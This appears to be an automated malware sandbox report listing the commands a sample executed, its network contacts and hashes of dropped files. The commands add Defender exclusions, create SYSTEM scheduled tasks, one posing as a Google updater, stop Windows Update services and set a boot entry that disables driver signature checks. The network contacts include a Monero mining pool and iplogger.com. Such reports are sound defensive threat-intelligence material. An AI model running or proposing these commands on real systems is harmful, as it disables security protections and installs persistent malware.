"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 05:10:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\PIpAHdz.exe\" KS /xAsite_idJGH 385119 /S" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\PIpAHdz.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\PIpAHdz.exe KS /xAsite_idJGH 385119 /S

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\wraIvY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
BG 171.22.28.239:42359 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
FI 77.91.124.71:4341 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-file-host6.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 194.169.175.235:42691 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 d3128977-dcce-4891-89ba-7f4709291041.uuid.dumppage.org udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp

Files

memory/1576-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1576-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1576-4-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1576-5-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1576-6-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1380-7-0x00000000026D0000-0x00000000026E6000-memory.dmp

memory/1576-8-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EC81.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\EC81.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\ED7B.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

\Users\Admin\AppData\Local\Temp\EC81.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\EED4.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\EED4.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\F00D.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\F00D.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\F136.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\F136.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Ar7rg98.exe

MD5 10e5dd5ec2a3592b3f5487c7919f35ad
SHA1 52a52ad728f6b61946543632dbae8c2d84c0ebbc
SHA256 69a4aaf260c5ef143f7ec3df81155921777dbbd64dedd2b8ede553992766a3d7
SHA512 66974a4159192f4739b14f0cc07c3c38060f93156de5a07d3c6e856abc7b640d1fc6519fdb7d7094a28200ed6ebeb6d2df1004d9f8674da54924ad0b1e11a8db

\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/796-104-0x0000000000C20000-0x0000000000C2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/2440-105-0x0000000001050000-0x000000000108E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

memory/2032-113-0x0000000000220000-0x000000000027A000-memory.dmp

\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

MD5 03875b6a92cc34e07d66d778c49723c9
SHA1 4ed6f143de7a8533eadb89df81ff8be011adc6a0
SHA256 debd7833fc2657b4da903739cccc5972633bee4243d386fff26c6d7aad86c670
SHA512 960ecd13c324b826982d8fa2a4bb45f3731f05f3c92474135ca5be3d901bc4d8747417c69fb94a6abde7e5463f3c7276026c2e74fb17dd1b0edab704b7927bf7

\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

MD5 03875b6a92cc34e07d66d778c49723c9
SHA1 4ed6f143de7a8533eadb89df81ff8be011adc6a0
SHA256 debd7833fc2657b4da903739cccc5972633bee4243d386fff26c6d7aad86c670
SHA512 960ecd13c324b826982d8fa2a4bb45f3731f05f3c92474135ca5be3d901bc4d8747417c69fb94a6abde7e5463f3c7276026c2e74fb17dd1b0edab704b7927bf7

